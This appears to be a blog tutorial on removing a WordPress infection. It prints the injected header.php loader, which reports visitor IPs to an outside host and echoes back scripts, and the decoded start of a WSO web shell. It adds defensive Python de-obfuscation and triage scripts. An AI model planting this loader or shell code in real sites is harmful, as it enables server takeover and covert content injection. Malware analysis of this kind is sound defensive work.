Remove WordPress PHP Virus

This tutorial walks through a real case in which a WordPress blog was infected, and how the WordPress PHP virus was removed.

The other day I noticed some suspicious code that appears to be a PHP virus targeting WordPress. The following PHP code was present in header.php, just before the </head> line.

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

This PHP code tries to retrieve the content of a resource from an external server, but the part that builds the URL is split into concatenated string fragments and is not written out in full.

The working mechanism is somewhat more complex and makes this WordPress PHP virus invisible to the visitors of affected sites. Instead, it targets search engines (Google), which in turn leads to a significant drop in the number of visitors to the affected websites.

Details of the WordPress PHP virus malware

1. The above code is present in header.php.

2. A new file, wp-log.php, appeared on the server in the wp-includes folder.

3. wp-log.php contains obfuscated code (base64-encoded and DEFLATE-compressed), which is relatively easy to decode.

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>
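The wrapper in wp-log.php can be unpacked without ever running it. The following Python script is an added example and is not code from the original post: it peels eval(gzinflate(base64_decode(...))) layers (including nested ones, which this post's single-layer case does not show) using zlib raw-DEFLATE decompression, which is exactly what PHP's gzinflate() performs. The wrap_layer helper and the SAMPLE_INNER payload are constructed for the demonstration; the real blob from the page is elided and is not reproduced here.

```python
import base64
import re
import zlib

# Matches the wrapper seen in wp-log.php: eval(gzinflate(base64_decode('<blob>')))
WRAPPER = re.compile(
    r"""eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=\s]+)['"]\s*\)\s*\)\s*\)""",
    re.S,
)


def gzinflate(data: bytes) -> bytes:
    """PHP's gzinflate() is raw DEFLATE with no zlib/gzip header: wbits = -15."""
    return zlib.decompress(data, -15)


def decode_layer(php_source: str):
    """Return the decoded payload of one wrapper, or None if the pattern is absent."""
    m = WRAPPER.search(php_source)
    if not m:
        return None
    blob = re.sub(r"\s+", "", m.group(1))  # tolerate line-wrapped base64
    return gzinflate(base64.b64decode(blob)).decode("utf-8", errors="replace")


def peel(php_source: str, max_layers: int = 10):
    """Decode nested wrappers until none remain.

    Returns (final_source, layers_removed). The result is only decoded,
    never evaluated, so this is safe to run on a captured file.
    """
    layers = 0
    current = php_source
    while layers < max_layers:
        nxt = decode_layer(current)
        if nxt is None:
            break
        current, layers = nxt, layers + 1
    return current, layers


def wrap_layer(php_source: str) -> str:
    """Constructed helper (not from the malware): build the same wrapper around a
    payload so the decoder can be demonstrated without a real malicious blob."""
    co = zlib.compressobj(9, zlib.DEFLATED, -15)  # raw DEFLATE, as gzdeflate() produces
    raw = co.compress(php_source.encode("utf-8")) + co.flush()
    return "<?php eval(gzinflate(base64_decode('%s'))); ?>" % base64.b64encode(raw).decode("ascii")


# Constructed stand-in for the decoded shell: the first lines shown in the post.
SAMPLE_INNER = "<?php $auth_pass = \"md5password\"; $default_action = 'FilesMan'; ?>"


if __name__ == "__main__":
    obfuscated = wrap_layer(wrap_layer(SAMPLE_INNER))  # two nested layers
    source, n = peel(obfuscated)
    print("%d layer(s) removed" % n)
    print(source)
```

To use it on a real sample, read the suspicious file into a string and pass it to peel(); compare the result against a known web shell (the decoded code above identifies itself through the WSO_VERSION constant) before deciding how far back the infection goes.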

The decoded malware code from wp-log.php:

<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center>

<form method=\"post\"><input name=\"pass\" type=\"password\" /><input type=\"submit\" value=\"\" /></form>");
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

This is a malicious PHP script, a web shell that identifies itself as WSO version 2.5 through the WSO_VERSION constant, which handles authentication and actions on files and directories on the server. Right at the top it declares variables such as $auth_pass (the MD5 hash of the access password, compared against md5($_POST['pass'])), $default_action (the default action, here the 'FilesMan' file manager), $default_use_ajax (use Ajax by default) and $default_charset (default character set).

The script also has a section that inspects the HTTP User-Agent and answers search-engine crawlers (Google, Slurp, MSNBot, ia_archiver, Yandex, Rambler) with a 404, so the shell stays out of their indexes, and a section that checks PHP safe mode and sets the working directory, including a directory supplied through the POST parameter c.

4. If wp-log.php is opened in a browser, a page with a password field appears. Behind it is a file manager through which new files can easily be uploaded to the compromised server.

How do you clean a WordPress website of this virus?

Manual cleanup always starts with finding and understanding the vulnerability that let the attacker in.

1. Make a backup of the entire website, including both the files and the database.

2. Estimate how long the virus has been present and search the web server for files modified or created within that time frame.

For example, to list the .php files created or modified in the last week, run this command on the server:

find /your/web/path -type f -mtime -7 -exec ls -l {} \; | grep "\.php$"

This simple method uncovers the infected WordPress files and any other files containing malware code.

3. Check the .htaccess file for suspicious directives, such as permission lines or script-execution rules.

4. Check the database. Posts and pages may well have been edited to include malware, and new users with the administrator role may have been added.

5. Check the write permissions of folders and files (chmod and chown).

Recommended permissions are: 644 for files and 755 for directories.

find /web/root/public/ -type f -exec chmod 644 {} \;
find /web/root/public/ -type d -exec chmod 755 {} \;

6. Update all WordPress plugins and themes.
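Steps 2 through 5 above can be scripted for repeatable triage. The following Python script is an added example and is not part of the original post: it builds a constructed sample tree (a clean footer.php, a header.php carrying the loader's variable names, and a wp-includes/wp-log.php with the eval(gzinflate(base64_decode())) wrapper), then lists recently modified .php files, greps for the indicators that appear in this post, flags the dropped wp-log.php, and reports and fixes any permissions that differ from 644/755. The indicator names, the sample tree and the candidate list of dropped files are assumptions made for the example; extend them with your own findings.

```python
import re
import shutil
import stat
import tempfile
import time
from pathlib import Path

# Indicator regexes derived from the code shown in this post (constructed labels).
INDICATORS = {
    "eval_gzinflate_base64": re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode"),
    "header_loader_vars": re.compile(r"\$wp_(rssh|gturl|cntnt)\b"),
    "wso_shell_markers": re.compile(r"WSO_VERSION|wsoLogin|FilesMan"),
}

# Files this infection dropped that a stock WordPress install does not contain (assumption).
DROPPED_FILE_CANDIDATES = ["wp-includes/wp-log.php"]


def find_recent_php(root, days, now=None):
    """Step 2: .php files modified within the last `days` days (like find -mtime -N)."""
    now = time.time() if now is None else now
    cutoff = now - days * 86400
    return sorted(str(p) for p in Path(root).rglob("*.php")
                  if p.is_file() and p.stat().st_mtime >= cutoff)


def grep_indicators(root):
    """Return {path: [indicator names]} for every .php file matching an indicator."""
    hits = {}
    for p in Path(root).rglob("*.php"):
        if not p.is_file():
            continue
        text = p.read_text(encoding="utf-8", errors="replace")
        names = [name for name, rx in INDICATORS.items() if rx.search(text)]
        if names:
            hits[str(p)] = names
    return hits


def unexpected_files(root):
    """Relative paths from DROPPED_FILE_CANDIDATES that exist under root."""
    return [c for c in DROPPED_FILE_CANDIDATES if (Path(root) / c).is_file()]


def bad_permissions(root):
    """Step 5: entries whose mode is not 644 (files) / 755 (directories)."""
    bad = []
    for p in Path(root).rglob("*"):
        mode = stat.S_IMODE(p.stat().st_mode)
        want = 0o755 if p.is_dir() else 0o644
        if mode != want:
            bad.append((str(p), oct(mode)))
    return bad


def fix_permissions(root):
    """Same effect as the two find/chmod commands in step 5; returns remaining bad count."""
    for p in Path(root).rglob("*"):
        p.chmod(0o755 if p.is_dir() else 0o644)
    return len(bad_permissions(root))


def triage_report(root, days=7):
    return {
        "recent_php": find_recent_php(root, days),
        "indicator_hits": grep_indicators(root),
        "unexpected_files": unexpected_files(root),
        "bad_permissions": bad_permissions(root),
    }


def make_sample_site():
    """Constructed sample tree (not a real site) so the checks can run offline."""
    root = Path(tempfile.mkdtemp(prefix="wp-triage-"))
    theme = root / "wp-content" / "themes" / "demo"
    theme.mkdir(parents=True)
    (root / "wp-includes").mkdir()
    (theme / "footer.php").write_text("<?php wp_footer(); ?>\n")
    # Stub echoing the variable names of the header.php loader; it contacts nothing.
    (theme / "header.php").write_text('<?php $wp_rssh = "http"; $wp_cntnt = ""; ?>\n')
    # Dropped file with the same wrapper as wp-log.php; the blob is a placeholder.
    (root / "wp-includes" / "wp-log.php").write_text(
        "<?php eval(gzinflate(base64_decode('PLACEHOLDER_BLOB'))); ?>\n")
    for p in root.rglob("*"):
        p.chmod(0o755 if p.is_dir() else 0o644)
    (root / "wp-includes" / "wp-log.php").chmod(0o777)  # world-writable dropped file
    return str(root)


def remove_sample_site(root):
    shutil.rmtree(root)


if __name__ == "__main__":
    site = make_sample_site()
    for key, value in triage_report(site).items():
        print(key, value)
    print("remaining bad permissions after fix:", fix_permissions(site))
    remove_sample_site(site)
```

Run it against a real document root by calling triage_report("/your/web/path", days=7) after taking the backup from step 1; review the indicator hits by hand (peel the wrapper rather than executing it) before deleting anything, since the same regexes will also match your own incident notes if they are stored under the web root.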

Related: Fix Redirect WordPress Hack 2023 (Redirect Virus)

These are the basic methods for cleaning a WordPress website or blog of this virus. If you run into problems and need help, the comment section is open.

Passionate about technology, I enjoy writing on StealthSettings.com since 2006. I have a rich experience in operating systems: macOS, Windows, and Linux, as well as in programming languages and blogging platforms (WordPress) and for online stores (WooCommerce, Magento, PrestaShop).
